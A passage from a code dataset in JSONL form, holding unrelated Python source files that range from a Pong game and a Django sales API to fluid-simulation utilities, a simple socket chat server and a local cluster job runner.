307.5\r\n bar1_move, bar2_move = 0. , 0.\r\n speed_circ = 250., 250., 250.\r\n bar1_score, bar2_score = 0,0\r\n b_x = 0.5\r\n b_y = 0.5\r\n v_x = 0.03\r\n v_y = 0.01\r\n p_y = 0.4\r\n # break\r\n\r\n else:\r\n (b_x, b_y, v_x, v_y, p_y) = res\r\n\r\n\r\n#AI of the computer.\r\n \r\n # print(\"update\")\r\n pygame.display.update()\r\n# time.sleep(5)","sub_path":"mp4/pongGUI.py","file_name":"pongGUI.py","file_ext":"py","file_size_in_byte":9030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"314882042","text":"import graphene\nfrom graphene_django import DjangoObjectType\nfrom graphene.utils.resolve_only_args import resolve_only_args\nfrom graphql import GraphQLError\nfrom graphql_jwt.decorators import login_required\n\nfrom healthid.apps.sales.models import (\n Sale, SaleDetail, SalesPrompt, SaleReturn, SaleReturnDetail)\n\nfrom healthid.utils.app_utils.database import get_model_object\nfrom healthid.utils.app_utils.pagination import pagination_query\nfrom healthid.utils.app_utils.pagination_defaults import PAGINATION_DEFAULT\nfrom healthid.utils.auth_utils.decorator import user_permission\nfrom healthid.utils.messages.sales_responses import SALES_ERROR_RESPONSES\n\n\nclass SalesPromptType(DjangoObjectType):\n class Meta:\n model = SalesPrompt\n\n\nclass SaleDetailType(DjangoObjectType):\n class Meta:\n model = SaleDetail\n\n\nclass SaleType(DjangoObjectType):\n register_id = graphene.Int(source='get_default_register')\n\n class Meta:\n model = Sale\n interfaces = (graphene.relay.Node,)\n\n id = graphene.ID(required=True)\n\n @resolve_only_args\n def resolve_id(self):\n return self.id\n\n\nclass ConsultationPaymentType(DjangoObjectType):\n\n class Meta:\n model = Sale\n\n\nclass SaleReturnType(DjangoObjectType):\n\n class Meta:\n model = SaleReturn\n\n\nclass SaleReturnDetailType(DjangoObjectType):\n class Meta:\n model = SaleReturnDetail\n\n\nclass Query(graphene.ObjectType):\n \"\"\"\n Return a list of sales prompt.\n Or return a single sales prompt specified.\n \"\"\"\n\n sales_prompts = graphene.List(SalesPromptType)\n sales_prompt = graphene.Field(SalesPromptType, id=graphene.Int())\n\n outlet_sales_history = graphene.List(SaleType,\n outlet_id=graphene.Int(required=True),\n search=graphene.String(),\n page_count=graphene.Int(),\n page_number=graphene.Int())\n all_sales_history = graphene.List(SaleType,\n page_count=graphene.Int(),\n page_number=graphene.Int())\n\n sale_history = graphene.Field(\n SaleType, sale_id=graphene.Int(required=True))\n\n @login_required\n @user_permission('Manager')\n def resolve_sales_prompts(self, info, **kwargs):\n return SalesPrompt.objects.all()\n\n @login_required\n @user_permission('Manager')\n def resolve_sales_prompt(self, info, **kwargs):\n id = kwargs.get('id')\n sales_prompt = get_model_object(SalesPrompt, 'id', id)\n return sales_prompt\n\n @login_required\n def resolve_outlet_sales_history(self, info, **kwargs):\n page_count = kwargs.get('page_count')\n page_number = kwargs.get('page_number')\n search = kwargs.get('search')\n outlet_id = kwargs.get('outlet_id')\n\n sale = Sale()\n resolved_value = sale.sales_history(\n outlet_id=outlet_id, search=search)\n\n if page_count or page_number:\n sales = pagination_query(\n resolved_value, page_count, page_number)\n Query.pagination_result = sales\n return sales[0]\n if resolved_value:\n paginated_response = pagination_query(resolved_value,\n PAGINATION_DEFAULT[\n \"page_count\"],\n PAGINATION_DEFAULT[\n \"page_number\"])\n\n Query.pagination_result = paginated_response\n return paginated_response[0]\n return GraphQLError(SALES_ERROR_RESPONSES[\"no_sales_error\"])\n\n @login_required\n def resolve_sale_history(self, info, sale_id):\n sale = get_model_object(Sale, 'id', sale_id)\n return sale\n\n @login_required\n @user_permission('Manager')\n def resolve_all_sales_history(self, info, **kwargs):\n page_count = kwargs.get('page_count')\n page_number = kwargs.get('page_number')\n\n resolved_value = Sale.objects.all()\n\n if page_count or page_number:\n sales = pagination_query(\n resolved_value, page_count, page_number)\n Query.pagination_result = sales\n return sales[0]\n if resolved_value:\n paginated_response = pagination_query(resolved_value,\n PAGINATION_DEFAULT[\n \"page_count\"],\n PAGINATION_DEFAULT[\n \"page_number\"])\n\n Query.pagination_result = paginated_response\n return paginated_response[0]\n return GraphQLError(SALES_ERROR_RESPONSES[\"no_sales_error\"])\n","sub_path":"healthid/apps/sales/schema/sales_schema.py","file_name":"sales_schema.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"513717656","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport sys\nimport gtk\nfrom Borg import Borg\nfrom NDImplementationDecorator import NDImplementationDecorator\n\n\nclass MisuseCaseNodeDialog:\n def __init__(self,objt,environmentName,dupProperty,overridingEnvironment,builder):\n self.window = builder.get_object(\"MisuseCaseNodeDialog\")\n self.decorator = NDImplementationDecorator(builder)\n self.decorator.updateTextCtrl(\"misuseCaseNameCtrl\",objt.name())\n\n b = Borg()\n proxy = b.dbProxy\n environmentId = proxy.getDimensionId(environmentName,'environment')\n threatName,vulName = proxy.riskComponents(objt.risk())\n\n threatId = proxy.getDimensionId(threatName,'threat')\n vulId = proxy.getDimensionId(vulName,'vulnerability')\n self.decorator.updateTextCtrl(\"misuseCaseThreatCtrl\",threatName)\n self.decorator.updateTextCtrl(\"misuseCaseLikelihoodCtrl\",proxy.threatLikelihood(threatId,environmentId))\n self.decorator.updateTextCtrl(\"misuseCaseVulnerabilityCtrl\",vulName)\n self.decorator.updateTextCtrl(\"misuseCaseSeverityCtrl\",proxy.vulnerabilitySeverity(vulId,environmentId))\n self.decorator.updateTextCtrl(\"misuseCaseRiskRatingCtrl\",proxy.riskRating(threatName,vulName,environmentName))\n\n attackers = proxy.threatAttackers(threatId,environmentId)\n attackerSet = set(attackers)\n attackers = []\n for attacker in attackerSet:\n attackers.append([attacker])\n self.decorator.updateListCtrl(\"misuseCaseAttackersCtrl\",['Attacker'],gtk.ListStore(str),attackers)\n\n threatenedAssets = proxy.threatenedAssets(threatId,environmentId)\n vulnerableAssets = proxy.vulnerableAssets(vulId,environmentId)\n assetSet = set(threatenedAssets + vulnerableAssets)\n assets = []\n for asset in assetSet:\n assets.append([asset])\n self.decorator.updateListCtrl(\"misuseCaseAssetsCtrl\",['Asset'],gtk.ListStore(str),assets)\n\n self.decorator.updateMLTextCtrl(\"misuseCaseNarrativeCtrl\",objt.narrative(environmentName,dupProperty))\n\n objectiveText = 'Exploit vulnerabilities in '\n for idx,vulAsset in enumerate(vulnerableAssets):\n objectiveText += vulAsset\n if (idx != (len(vulnerableAssets) -1)):\n objectiveText += ','\n objectiveText += ' to threaten '\n for idx,thrAsset in enumerate(threatenedAssets):\n objectiveText += thrAsset\n if (idx != (len(threatenedAssets) -1)):\n objectiveText += ','\n objectiveText += '.'\n self.decorator.updateTextCtrl(\"misuseCaseObjectiveCtrl\",objectiveText)\n\n\n self.window.resize(350,100)\n\n def on_misuseCaseOkButton_clicked(self,callback_data):\n self.window.destroy()\n\n def show(self):\n self.window.show()\n","sub_path":"cairis/cairis/MisuseCaseNodeDialog.py","file_name":"MisuseCaseNodeDialog.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"354040361","text":"#!/usr/bin/env python\n\nimport rospy,math,sys\nfrom geometry_msgs.msg import Twist\nfrom turtlesim.msg import Pose\n\nclass Turtle():\n def __init__(self,name,max_linear,max_steer,target):\n self.max_steer = max_steer\n self.max_linear = max_linear\n self.target = target\n self.name = name\n self.pub = rospy.Publisher(\"/{}/cmd_vel\".format(self.name),Twist,queue_size=10) \n \n def subscriber(self):\n self.sub = rospy.Subscriber(\"/{}/pose\".format(self.name),Pose,self.move)\n rospy.spin()\n\n def move(self,msg):\n dx = self.target[0]-msg.x; dy = self.target[1]-msg.y # Calculates vector_towards_target\n mov = Twist()\n if((dx**2+dy**2)**0.5<=0.1): #If arrived\n mov.linear.x = 0\n mov.angular.z = 0\n self.pub.publish(mov)\n rospy.loginfo(\"\"\"\nArrived at:\n x: {}\n y: {}\ntheta: {}\n \"\"\".format(msg.x,msg.y,msg.theta))\n rospy.signal_shutdown(\"ARRIVED\")\n else:\n dabs = (dx**2+dy**2)**0.5 #Calculate |vector_towards_target|\n self.desired = (dx/dabs,dy/dabs) #Assign as tuple\n steer_factor = (math.cos(msg.theta)*self.desired[1]-math.sin(msg.theta)*self.desired[0]) #Calculate steer factor based on the turtle theta angle and the vector_towards_target\n mov.linear.x = (1-abs(steer_factor))*self.max_linear #To lower the path, linear vel is small when angular vel is high\n mov.angular.z = steer_factor*self.max_steer\n self.pub.publish(mov)\n\nif __name__ == \"__main__\":\n rospy.init_node(\"path_planning\")\n if(len(sys.argv)==3): #Check arguments\n if(float(sys.argv[1])>=0 and float(sys.argv[1])<=11 and float(sys.argv[2])>=0 and float(sys.argv[2])<=11): #Check coordinates values\n t1 = Turtle(\"turtle1\",2,4,(float(sys.argv[1]),float(sys.argv[2])))\n rospy.loginfo(\"Ready!\")\n t1.subscriber()\n else: rospy.loginfo(\" WARNING: 0 <= x,y <= 11\")\n else:\n rospy.loginfo(\"Assign: x y (Destiny coordinates)\")\n \n\n \n\n\n","sub_path":"turtle_challenge/src/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"288182573","text":"from home.listofstockscrypto import *\nfrom home.aiscripts import *\nfrom home.financepi import *\nfrom home.medai import *\nimport math\nimport random\n\ndef getBuy_hard(buyingPower):\n\tlist = getDow()\n\thi_score = -10000000\n\thi_item = 'blank'\n\tfor item in list:\n\t\tpos, neg, neut, tnum = getTwitterSentiments(item)\n\t\tif neg == 0:\n\t\t\tneg = 1\n\t\tif tnum == 0:\n\t\t\ttwit_score = 1\n\t\telse:\n\t\t\ttwit_score = pos/neg\n\t\t\n\t\tdata = getLastMonth(item)\n\t\t[w,b,loss] = runLinearReg(data)\n\t\tlinreg_score = w*1000/loss\n\t\t\n\t\tpos, neg, neut, lnum = getNewsSentiments(item)\n\t\tif neg == 0:\n\t\t\tneg = 1\n\t\tif lnum == 0:\n\t\t\tnews_score = 1\n\t\telse:\n\t\t\tnews_score = pos/neg\n\t\t\n\t\ttot_score = twit_score*linreg_score*news_score\n\t\tif tot_score>hi_score:\n\t\t\thi_score = tot_score\n\t\t\thi_item = item\n\tprice = getPriceFromAPI(hi_item, False)\n\trangeNumToBuy = math.floor(abs(0.25*float(buyingPower)/float(price)))\n\trandBuyNum = random.randint(1, rangeNumToBuy)\n\treturn [hi_item, randBuyNum]\n\t\ndef getSell_hard(currAssets, currAmts):\n\tif not currAssets:\n\t\treturn 'none123', 0\n\tlo_score = 1000000000\n\tlo_item = 'blank'\n\tindex = 0\n\tlo_index = 0\n\tfor item in currAssets:\n\t\tpos, neg, neut, tnum = getTwitterSentiments(item)\n\t\tif neg == 0:\n\t\t\tneg = 1\n\t\tif tnum == 0:\n\t\t\ttwit_score = 1\n\t\telse:\n\t\t\ttwit_score = pos/neg\n\t\t\n\t\tdata = getLastMonth(item)\n\t\t[w,b,loss] = runLinearReg(data)\n\t\tlinreg_score = w*1000/loss\n\t\t\n\t\tpos, neg, neut, lnum = getNewsSentiments(item)\n\t\tif neg == 0:\n\t\t\tneg = 1\n\t\tif lnum == 0:\n\t\t\tnews_score = 1\n\t\telse:\n\t\t\tnews_score = pos/neg\n\t\t\n\t\ttot_score = twit_score*linreg_score*news_score\n\t\tif tot_score.*)$', 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT}),\n ) if settings.DEBUG else urlpatterns\n","sub_path":"example/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"494962885","text":"# Tools for pre- and post-processing AFiD data\n\nimport h5py\nimport numpy as np\n\nclass Grid:\n \"\"\"\n Class containing the coordinates of all grids used in the simulation\n \"\"\"\n def __init__(self, folder):\n with h5py.File(folder+\"/outputdir/cordin_info.h5\",\"r\") as f:\n self.xm = f[\"xm\"][()]\n self.xc = f[\"xc\"][()]\n self.ym = f[\"ym\"][()]\n self.zm = f[\"zm\"][()]\n if \"xmr\" in list(f.keys()):\n self.xmr = f[\"xmr\"][()]\n self.xcr = f[\"xcr\"][()]\n self.ymr = f[\"ymr\"][()]\n self.zmr = f[\"zmr\"][()]\n else:\n self.xmr, self.xcr = np.array([]), np.array([])\n self.ymr, self.zmr = np.array([]), np.array([])\n if self.ym.size > 1:\n dy = self.ym[1] - self.ym[0]\n self.yc = np.arange(0, dy*(self.ym.size+1), dy)\n else: self.yc = np.array([0, 2*self.ym[0]])\n if self.ymr.size > 1:\n dyr = self.ymr[1] - self.ymr[0]\n self.ycr = np.arange(0, dyr*(self.ymr.size+1), dyr)\n elif self.ymr.size==1:\n self.ycr = np.array([0,2*self.ymr[0]])\n else: self.ycr = []\n if self.zm.size > 1:\n dz = self.zm[1] - self.zm[0]\n self.zc = np.arange(0, dz*(self.zm.size+1), dz)\n else: self.zc = np.array([0, 2*self.zm[0]])\n if self.zmr.size > 1:\n dzr = self.zmr[1] - self.zmr[0]\n self.zcr = np.arange(0, dzr*(self.zmr.size+1), dzr)\n elif self.zmr.size==1:\n self.zcr = np.array([0,2*self.zmr[0]])\n else: self.zcr = []\n\nclass InputParams:\n \"\"\"\n Class containing the simulation parameters specified by\n the input file `bou.in`.\n \"\"\"\n def __init__(self, folder):\n fname = folder+\"/bou.in\"\n with open(fname,\"r\") as f:\n bou = f.readlines()\n if len(bou)==55:\n # Current format\n self.nxm, self.nym, self.nzm, self.nsst = [\n int(n) for n in bou[2].split()\n ]\n self.multires, self.nxmr, self.nymr, self.nzmr = [\n int(n) for n in bou[6].split()\n ]\n self.flagsal, self.flagpf = [\n n!=\"0\" for n in bou[10].split()\n ]\n self.tout, self.tframe = [\n float(n) for n in bou[22].split()[:2]\n ]\n self.save_3D = float(bou[22].split()[-1])\n self.alx3, self.ylen, self.zlen = [\n float(n) for n in bou[26].split()\n ]\n self.istr3 = int(bou[30].split()[0])\n self.str3 = float(bou[30].split()[1])\n self.istr3r = int(bou[30].split()[2])\n self.RayT, self.PraT, self.RayS, self.PraS = [\n float(n) for n in bou[34].split()[:-1]\n ]\n self.FFscaleS = bou[34].split()[-1]==\"1\"\n self.inslwS, self.inslwN, self.TfixS, self.TfixN, self.SfixS, self.SfixN = [\n n!=\"0\" for n in bou[42].split()\n ]\n self.active_T, self.active_S = [\n n!=\"0\" for n in bou[46].split()[:-1]\n ]\n self.gAxis = int(bou[46].split()[-1])\n self.xplusU, self.xminusU, self.dPdy, self.dPdz = [\n float(n) for n in bou[50].replace(\"d\",\"e\").split()[:-1]\n ]\n self.pf_D, self.pf_A, self.pf_S, self.pf_Tm = [\n float(n) for n in bou[54].split()[:4]\n ]\n self.IBM = bou[54].split()[4]!=\"0\"\n self.pf_IC = int(bou[54].split()[-1])\n \n elif len(bou)==24:\n self.nxm, self.nym, self.nzm = [\n int(n) for n in bou[1].split()[:3]\n ]\n self.nxmr, self.nymr, self.nzmr = [\n int(n) for n in bou[3].split()\n ]\n self.tout = float(bou[5].split()[2])\n self.FFscaleS = bou[5].split()[-1]==\"0\"\n self.alx3 = float(bou[7].split()[0])\n self.ylen, self.zlen = [\n float(n) for n in bou[9].split()\n ]\n self.RayT, self.PraT, self.RayS, self.PraS = [\n float(n) for n in bou[11].split()[:4]\n ]\n self.inslwS, self.inslwN, self.TfixS, self.TfixN, self.SfixS, self.SfixN = [\n n!=\"0\" for n in bou[15].split()[:6]\n ]\n self.gAxis = int(bou[15].split()[-1])\n self.xplusU, self.xminusU, self.dPdz = [\n float(n) for n in bou[21].replace(\"d\",\"e\").split()\n ]\n self.tframe = float(bou[23].split()[0])\n self.flagsal = True\n\n\n\ndef read_mean(folder, varname):\n \"\"\"\n Returns a 2D array containing the time-series of the wall-normal\n profile of the specified variable `varname`.\n \"\"\"\n with h5py.File(folder+\"/outputdir/means.h5\",\"r\") as f:\n samplist = list(f[varname].keys())\n Nsamp = len(samplist)\n nx = f[varname+\"/\"+samplist[0]].size\n var = np.zeros((nx,Nsamp))\n i = 0\n for num in samplist:\n var[:,i] = f[varname+\"/\"+num][()]\n i = i + 1\n return var\n\ndef read_cut(folder, var, idx, plane):\n \"\"\"\n Returns a 2D slice of sample number `idx` of the variable `var`.\n `plane` can be 'x', 'y', or 'z' and specifies which dimension\n is sliced to obtain the cut. `folder` specifies the root directory\n of the simulation.\n \"\"\"\n varname = var+\"/\"+\"%05d\" % idx\n with h5py.File(folder+\"/outputdir/flowmov/movie_\"+plane+\"cut.h5\",\"r\") as f:\n A = np.array(f[varname][()])\n return A\n\ndef continua_master_from_input(folder, time=0.0):\n \"\"\"\n This function generates the file `continua_master.h5` needed to run\n a simulation from the continua files. Optionally pass the `time` variable\n to set the start time value for the simulation.\n \"\"\"\n # with open(folder+\"/bou.in\", \"r\") as f:\n # for i, line in enumerate(f):\n # if i==2:\n # nxm, nym, nzm = [int(n) for n in line.split()[0:3]]\n # if i==6:\n # nxmr, nymr, nzmr = [int(n) for n in line.split()[1:4]]\n # if i==26:\n # ylen, zlen = [int(n) for n in line.split()[1:3]]\n # if i==30:\n # istr3, str3, istr3r = [float(n) for n in line.split()]\n inputs = InputParams(folder)\n\n with h5py.File(folder+\"/outputdir/continua_master.h5\",\"w\") as f:\n f[\"nx\"], f[\"ny\"], f[\"nz\"] = inputs.nxm + 1, inputs.nym + 1, inputs.nzm + 1\n if inputs.multires:\n f[\"nxr\"], f[\"nyr\"], f[\"nzr\"] = inputs.nxmr + 1, inputs.nymr + 1, inputs.nzmr + 1\n f[\"ylen\"], f[\"zlen\"] = inputs.ylen, inputs.zlen\n f[\"istr3\"], f[\"str3\"] = int(inputs.istr3), inputs.str3\n if inputs.multires: f[\"istr3r\"] = int(inputs.istr3r)\n f[\"time\"] = time\n return\n\ndef write_continua(folder, varname, var):\n \"\"\"\n Generates a continua file for the variable `varname` from the\n data in array `var`.\n \"\"\"\n with h5py.File(folder+\"/outputdir/continua_\"+varname+\".h5\",\"w\") as f:\n f[\"var\"] = var\n return\n\ndef z_vorticity(folder, idx, grid):\n \"\"\"\n Returns a cut of the z-component of vorticity, calculated by the\n derivatives of the vx and vy fields. Sample number `idx`, simulation\n directory `folder` and grid data `grid` are needed.\n \"\"\"\n vx = read_cut(folder, \"vx\", idx, \"z\")\n vy = read_cut(folder, \"vy\", idx, \"z\")\n\n dvxdy, dvydx = np.zeros(vx.shape), np.zeros(vy.shape)\n dy = (grid.ym[1] - grid.ym[0])\n\n dvxdy[1:-1,:] = (vx[2:,:] - vx[:-2,:])/2/dy\n dvxdy[0,:] = (vx[1,:] - vx[-1,:])/2/dy\n dvxdy[-1,:] = (vx[0,:] - vx[-2,:])/2/dy\n\n dvydx[:, 1:-1] = (vy[:,2:] - vy[:,:-2])/(grid.xm[2:] - grid.xm[:-2])\n dvydx[:, 0] = (vy[:,1] - 0)/(grid.xm[1] - 0)\n dvydx[:, -1] = (0 - vy[:,-2])/(1 - grid.xm[-2])\n\n dyu = 0.5*(dvxdy[:,1:] + dvxdy[:,:-1])\n\n dxv = np.zeros(vy.shape)\n dxv[:-1,:] = 0.5*(dvydx[1:,:] + dvydx[:-1,:])\n dxv[-1,:] = 0.5*(dvydx[0,:] + dvydx[-1,:])\n\n ζ = dxv - dyu\n\n return ζ","sub_path":"afidtools/afidtools.py","file_name":"afidtools.py","file_ext":"py","file_size_in_byte":8039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"223662269","text":"import socket\nimport threading\nimport sys\nimport os\nfrom queue import Queue\nimport time\n\ns = socket.socket()\nconn = []\nadd = []\nq = Queue()\n\ndef bind():\n s.bind('localhost', 9999)\n print(\"Binding Successful\")\n s.listen(3)\n\ndef accept():\n for i in conn:\n c.close()\n del conn[:]\n del add[:]\n while True:\n c, a = s.accept()\n s.setblocking(1)\n conn.append(c)\n add.append(a)\n print(\"Connection established. IP Address\", a[0], \"Port:\", a[1])\n data = s.recv(1024)\n data = data.decode(\"utf-8\")\n chat(data)\n\ndef chat(data):\n c = get(data)\n if c is not None:\n transfer(conn, data)\n\ndef get(data):\n t = int(data[0])\n c = conn[t]\n return c\n\ndef transfer(c, data):\n r = int(data[2])\n if conn[r] is not None:\n conn[r].send(data[5:] + \" from \" + data[2]).encode(' ')\n else:\n print(\"Recipent not connected\")\n\ndef create_threads():\n t = threading.Thread(target=work())\n t.daemon(True)\n t.start()\n\ndef work():\n for i in 2:\n x = q.get()\n if x == 1:\n create()\n bind()\n accept()\n if x == 2:\n chat()\n q.task_done()\n\ndef create_jobs():\n for x in 2:\n q.put(x)\n q.join()\n\ndef main():\n create_threads()\n create_jobs()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Python/SocketProgramming/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"73672533","text":"#! /usr/bin/env python\nfrom ClusterSubmission.ClusterEngine import ClusterEngine\nfrom ClusterSubmission.Utils import CreateDirectory, ResolvePath, id_generator, getRunningThreads, ReadListFromFile, WriteList, AppendToList\nimport os, time, threading, logging\nlogging.basicConfig(format='%(levelname)s : %(message)s', level=logging.INFO)\n\n\n###############################################################\n## LocalEngine\n## the local engine manages the local submission of the jobs\n## i.e. many threads are started in parallel\n###############################################################\nclass LocalEngine(ClusterEngine):\n def __init__(self, jobName=\"\", baseDir=\"\", maxCurrentJobs=-1, singularity_image=\"\", run_in_container=False):\n ClusterEngine.__init__(self,\n jobName=jobName,\n baseDir=baseDir,\n maxCurrentJobs=maxCurrentJobs,\n submit_build=run_in_container,\n singularity_image=singularity_image,\n run_in_container=run_in_container)\n self.__threads = []\n self.__runned_jobs = 0\n\n def get_threads(self):\n return self.__threads\n\n def n_threads(self):\n return len(self.get_threads())\n\n def get_array_size(self, task_name=\"\"):\n return len([x for x in self.get_threads() if x.name() == task_name])\n\n #### Basic method to submit a job\n def submit_job(self, script, sub_job=\"\", mem=-1, env_vars=[], hold_jobs=[], run_time=\"\"):\n ### Memory is senseless in this setup. Do not pipe it further\n pending_threads, direct_pending = self.get_holding_threads(hold_jobs=hold_jobs)\n exec_script = self.pack_environment(env_vars, script)\n if not exec_script: return False\n self.set_cluster_control_module(\"ClusterSubmission/ClusterControlLOCAL.sh\")\n self.__threads += [\n LocalClusterThread(thread_name=self.subjob_name(sub_job),\n subthread=-1,\n thread_engine=self,\n dependencies=pending_threads + [th for th in direct_pending if th.thread_number() == i + 1],\n script_exec=exec_script)\n ]\n return True\n\n def get_holding_threads(self, hold_jobs=[]):\n pending_threads = []\n direct_pending = []\n for th in self.get_threads():\n for hold in self.to_hold(hold_jobs):\n ### Simple name matching\n if isinstance(hold, str):\n if hold == th.name():\n pending_threads += [th]\n break\n elif isinstance(hold, tuple):\n if hold[0] == th.name() and th.thread_number() > 0:\n if isinstance(hold[1], list):\n if th.thread_number() in hold[1]:\n pending_threads += [th]\n break\n elif -1 in hold[1]:\n direct_pending += [th]\n elif isinstance(hold[1], int) and -1 == hold[1]:\n direct_pending += [th]\n return pending_threads, direct_pending\n\n def submit_array(self, script, sub_job=\"\", mem=-1, env_vars=[], hold_jobs=[], run_time=\"\", n_cores=1, array_size=-1):\n if array_size < 1:\n logging.error(\": Please give a valid array size\")\n return False\n pending_threads, direct_pending = self.get_holding_threads(hold_jobs=hold_jobs)\n exec_script = self.pack_environment(env_vars, script)\n if not exec_script: return False\n self.set_cluster_control_module(\"ClusterSubmission/ClusterControlLOCAL.sh\")\n for i in range(array_size):\n self.__threads += [\n LocalClusterThread(thread_name=self.subjob_name(sub_job),\n subthread=i + 1 if array_size > 0 else -1,\n thread_engine=self,\n dependencies=pending_threads + [th for th in direct_pending if th.thread_number() == i + 1],\n script_exec=exec_script)\n ]\n return True\n\n def print_status(self, running):\n logging.info(\": Executed %d/%d jobs at the moment %d jobs are running\" %\n (self.__runned_jobs, self.n_threads(), len(running)))\n for th in running:\n if not th.isAlive(): return\n th.print_log_file()\n time.sleep(0.2)\n\n def finish(self):\n CreateDirectory(self.log_dir(), False)\n CreateDirectory(self.tmp_dir(), False)\n executable = [th for th in self.get_threads() if th.is_launchable()]\n running = []\n dead_jobs = []\n\n cycles = 0\n ### There are still some jobs to execute\n while self.__runned_jobs + len(dead_jobs) < self.n_threads():\n cycles += 1\n running = [th for th in running if th.isAlive()]\n if len(running) < self.max_running_per_array():\n for th in executable:\n if len(running) >= self.max_running_per_array(): break\n th.start()\n self.__runned_jobs += 1\n running += [th]\n executable = [th for th in self.get_threads() if th.is_launchable()]\n else:\n dead_jobs += [th for th in self.get_threads() if th.is_dead() or th.in_dead_chain() and not th in dead_jobs]\n time.sleep(1)\n if cycles % 120 == 0:\n self.print_status(running)\n\n while getRunningThreads(running) > 0:\n time.sleep(0.5)\n cycles += 1\n if cycles % 120 == 0:\n self.print_status(running)\n\n ### Need to do something with the dead jobs. At least inform the user\n\n\nclass LocalClusterThread(threading.Thread):\n def __init__(self, thread_name=\"\", subthread=-1, thread_engine=None, dependencies=[], script_exec=\"\"):\n threading.Thread.__init__(self)\n self.__engine = thread_engine\n self.__name = thread_name\n self.__sub_num = subthread\n\n self.__isSuccess = False\n self.__started = False\n self.__dependencies = [d for d in dependencies]\n self.__script_to_exe = script_exec\n self.__tmp_dir = \"%s/%s\" % (thread_engine.tmp_dir(), id_generator(50))\n CreateDirectory(self.__tmp_dir, True)\n self.__env_vars = [(\"LOCAL_TASK_ID\", \"%d\" % (self.thread_number())), (\"TMPDIR\", self.__tmp_dir)]\n\n def __del__(self):\n logging.info(\": Clean up %s\" % (self.__tmp_dir))\n os.system(\"rm -rf %s\" % (self.__tmp_dir))\n\n def dependencies(self):\n return self.__dependencies\n\n def thread_engine(self):\n return self.__engine\n\n def thread_number(self):\n return self.__sub_num\n\n def name(self):\n return self.__name\n\n def is_launchable(self):\n if self.isAlive() or self.__started or self.in_dead_chain(): return False\n self.__dependencies = [th for th in self.__dependencies if th.isAlive() or not th.is_started() or not th.is_success()]\n return len(self.__dependencies) == 0\n\n def in_dead_chain(self):\n return len([th for th in self.__dependencies if th.is_dead() or th.in_dead_chain()]) > 0\n\n def is_dead(self):\n return not self.isAlive() and self.is_started() and not self.is_success()\n\n def is_success(self):\n return self.__isSuccess\n\n def is_started(self):\n return self.__started\n\n def run(self):\n self.__started = True\n ###################\n self.__isSuccess = self._cmd_exec()\n\n def log_file(self):\n return \"%s/%s%s.log\" % (self.thread_engine().log_dir(), self.name(), \"\" if self.thread_number() < 1 else \"_%d\" %\n (self.thread_number()))\n\n def print_log_file(self, last_lines=10):\n if not os.path.exists(self.log_file()): return\n log_content = ReadListFromFile(self.log_file())\n n_lines = len(log_content)\n for i in range(max(0, n_lines - last_lines), n_lines):\n if self.thread_number() == -1:\n logging.info(\"<%s> %s\" % (self.name(), log_content[i]))\n else:\n logging.info(\n \"<%s - %d/%d> %s\" %\n (self.name(), self.thread_number(), self.thread_engine().get_array_size(task_name=self.name()), log_content[i]))\n\n def _cmd_exec(self):\n if not os.path.exists(self.__script_to_exe):\n logging.error(\"<_cmd_exec>: Could not find %s\" % (self.__script_to_exe))\n return False\n ### Threads can set their own enviroment variables without affecting the others\n os.system(\"chmod 0700 %s\" % (self.__script_to_exe))\n if self.thread_number() == -1:\n logging.info(\"<_cmd_exec> Start job %s\" % (self.name()))\n else:\n logging.info(\"<_cmd_exec> Start task %d/%d in job %s\" %\n (self.thread_number(), self.thread_engine().get_array_size(task_name=self.name()), self.name()))\n cmd_file = self.thread_engine().pack_environment(env_vars=self.__env_vars, script=self.__script_to_exe)\n\n return os.system(\"python %s --Cmd %s > %s 2>&1\" % (ResolvePath(\"ClusterSubmission/exeScript.py\"), cmd_file, self.log_file())) == 0\n","sub_path":"ClusterSubmission/python/LocalEngine.py","file_name":"LocalEngine.py","file_ext":"py","file_size_in_byte":9538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"275653492","text":"#coding=utf-8\nimport sys,time,unittest,xmlrunner,os\nfrom Sys_NCP.PageObj.NCPTest import NCPTest\nfrom Utils.scriptTestCase import scriptTestCase\n\nclass CombinationConditionQuery(unittest.TestCase):\n '''合同管理>合同查询>查询功能-组合条件查询 '''\n Screenshotfilepath = \"\" # 接收本轮截屏文件保存路径\n s = os.sep\n sTC = scriptTestCase()\n\n def setUp(self):\n pass\n def testCountManage(self):\n test = NCPTest()\n self.Screenshotfilepath = test.get_check_filepath(self.Screenshotfilepath)\n testdatas = self.sTC.get_ContractQuery_CombinationConditionTestData()\n # test.login('admin', '88888888')\n test.defaultLoginInfo()\n for i in range(0,len(testdatas)):\n test.go_to_menu('合同管理', '合同查询')\n if testdatas[i]['QueryMethod'] == 'CombinationCondition':\n countValues = testdatas[i]['LocationValue'].split(',')\n for j in range(0,len(countValues)):\n Queryvalue = countValues[j].split('|')\n if Queryvalue[0] == 